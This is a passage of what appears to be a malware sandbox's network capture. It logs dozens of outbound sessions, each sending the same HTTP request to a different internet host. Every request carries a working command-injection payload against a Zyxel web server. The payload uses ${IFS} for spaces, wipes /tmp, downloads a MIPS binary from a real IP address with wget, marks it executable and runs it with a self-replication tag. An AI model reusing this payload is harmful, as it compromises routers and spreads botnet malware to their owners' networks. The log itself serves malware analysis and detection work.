                              555192.168.2.135293468.129.213.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484375954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              556192.168.2.136059832.61.132.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484411001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              557192.168.2.1343558184.190.66.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484455109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              558192.168.2.134332665.108.137.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484483957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              559192.168.2.135522214.19.23.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484539032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              560192.168.2.134109665.52.163.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484571934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              561192.168.2.133489067.150.175.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484603882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              562192.168.2.1344916219.12.166.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484647036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              563192.168.2.135722081.190.5.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484699965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              564192.168.2.134023019.21.8.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484738111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              565192.168.2.1345142140.117.64.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484786987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              566192.168.2.1356580124.126.173.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484847069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              567192.168.2.1336488187.151.204.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484872103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              568192.168.2.1351142120.7.86.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484909058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              569192.168.2.1358140170.145.115.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484946966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              570192.168.2.1337502180.73.181.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.484982014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              571192.168.2.135846243.77.216.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485045910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              572192.168.2.1343524134.48.54.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485074997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              573192.168.2.1339444120.109.115.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485125065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              574192.168.2.134559465.222.132.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485182047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              575192.168.2.133373485.136.186.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485229969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              576192.168.2.135612086.84.237.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485277891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              577192.168.2.135186662.98.255.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485327005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              578192.168.2.1346020180.77.18.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485400915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              579192.168.2.135151831.199.33.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485433102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              580192.168.2.1356680206.38.56.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485433102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              581192.168.2.1359758143.80.226.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485475063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              582192.168.2.1339914180.41.226.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485501051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              583192.168.2.134281441.218.122.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485523939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              584192.168.2.1348776197.175.73.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485575914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              585192.168.2.1335316159.26.52.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485609055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              586192.168.2.1345938166.131.124.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485655069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              587192.168.2.135625095.182.126.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485692978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              588192.168.2.133588624.79.217.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485748053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              589192.168.2.13513082.112.30.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485765934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              590192.168.2.136034044.107.33.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485824108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              591192.168.2.1348360201.97.51.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485847950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              592192.168.2.134822088.125.163.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485896111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              593192.168.2.135210659.199.5.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485941887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              594192.168.2.1357492131.161.104.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485970974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              595192.168.2.1335854207.200.222.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.485991955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              596192.168.2.1359394201.152.171.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486012936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              597192.168.2.1341586199.74.233.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486089945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              598192.168.2.133693667.184.79.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486112118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              599192.168.2.134938647.211.84.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486176014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              600192.168.2.1338668182.191.106.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486200094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              601192.168.2.1335510223.3.152.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486259937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              602192.168.2.1342106192.10.65.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486293077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              603192.168.2.133561851.62.184.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486324072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              604192.168.2.134014037.213.234.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486382961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              605192.168.2.1338018221.139.201.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486422062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              606192.168.2.1357890192.24.15.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486469984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              607192.168.2.13487441.6.158.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486494064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              608192.168.2.135353641.155.188.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486536980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              609192.168.2.1357386128.74.132.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486581087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              610192.168.2.1336330128.64.12.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486613035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              611192.168.2.134359659.114.195.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486675978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              612192.168.2.1357608126.26.60.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486709118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              613192.168.2.1350176161.232.101.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486784935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              614192.168.2.1339236159.175.12.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486818075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              615192.168.2.1340962191.254.94.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486877918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              616192.168.2.1348386207.226.150.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486907005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              617192.168.2.13331585.38.176.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486927986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              618192.168.2.1347910211.43.109.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.486979008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              619192.168.2.1360620158.115.19.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487015963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              620192.168.2.134265053.19.181.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487039089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              621192.168.2.1358616168.248.255.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487085104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              622192.168.2.134568067.182.244.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487112999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              623192.168.2.135522632.244.1.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487150908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              624192.168.2.135711685.130.64.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:04.487217903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


